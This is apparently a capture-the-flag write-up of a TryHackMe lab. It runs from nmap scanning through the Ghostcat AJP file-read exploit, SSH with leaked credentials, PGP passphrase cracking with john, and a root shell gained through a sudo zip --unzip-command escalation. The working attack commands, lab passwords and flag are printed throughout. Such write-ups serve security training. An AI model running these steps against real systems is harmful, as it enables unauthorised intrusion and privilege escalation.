sudo nmap -p- -sC -sV -vv -Pn -A -O 10.10.84.159
	we have a few ports open
		53
		22
		8080
		8009
	port 8080 brings us to a tomcat page
using searchsploit I was not able to find anything immediantely for the webpage
I decided to enumerate port 8009 some more
	I find that it is using the service ajp
when conducting a searchsploit on ajp we see that there is a vulnerability with this
kali@kali:~$ searchsploit ajp
------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                             |  Path
------------------------------------------------------------------------------------------- ---------------------------------
AjPortal2Php - 'PagePrefix' Remote File Inclusion                                          | php/webapps/3752.txt
Apache Tomcat - AJP 'Ghostcat File Read/Inclusion                                          | multiple/webapps/48143.py
Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion (Metasploit)                            | multiple/webapps/49039.rb
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Lets work with this, I start to look up AJP attacks and this is what i found
https://medium.com/@sushantkamble/apache-ghostcat-cve-2020-1938-explanation-and-walkthrough-23a9a1ae4a23
Now that we have that we can download AJP
git clone https://github.com/00theway/Ghostcat-CNVD-2020-10487
cd Ghostcat
	python3 ajpShooter.py http://10.10.84.159:8080 8009 /WEB-INF/web.xml read
Now we can see that we have a user, and maybe a password?
	skyfuck:8730281lkjlkjdqlksalks
lets see if we can use that to ssh into the box
ls -la
cat tryhackme.asc
	cool we got a pgp private key, make a mental note of that
cd /home
	ls -la
	alright we have two users, skyfuck and merlin
cd merlin
	cat user.txt
THM{GhostCat_1s_so_cr4sy}
Alright we are not getting anywhere with sudo -l or sudo -s
	lets go back to that pgp 
Using scp lets grab that file
scp skyfuck@10.10.84.159:/home/skyfuck/* .
alright we got both the files
gpg2john tryhackme.asc > hackme
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexandru        (tryhackme)
1g 0:00:00:00 DONE (2021-01-27 01:04) 10.00g/s 10720p/s 10720c/s 10720C/s chinita..alexandru
Use the "--show" option to display all of the cracked passwords reliably

alright we have the passphrase
now we need to import the tryhackme.asc keys
	password:alexandru
now decrypt the credential.pgp
	gpg -d credential.pgp 
	password:alexandru
Now we have merlins password
	merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip

we can run zip?
alright... there is a zip priv escalation
https://www.hackingarticles.in/linux-for-pentester-zip-privilege-escalation/

Alright we cannot do nano, but we can make a txt file with touch
	cd merlin
	touch haha.txt
sudo zip root.zip haha.txt -T  --unzip-command="sh -c /bin/bash"
AND NOW I AM ROOT haha


	
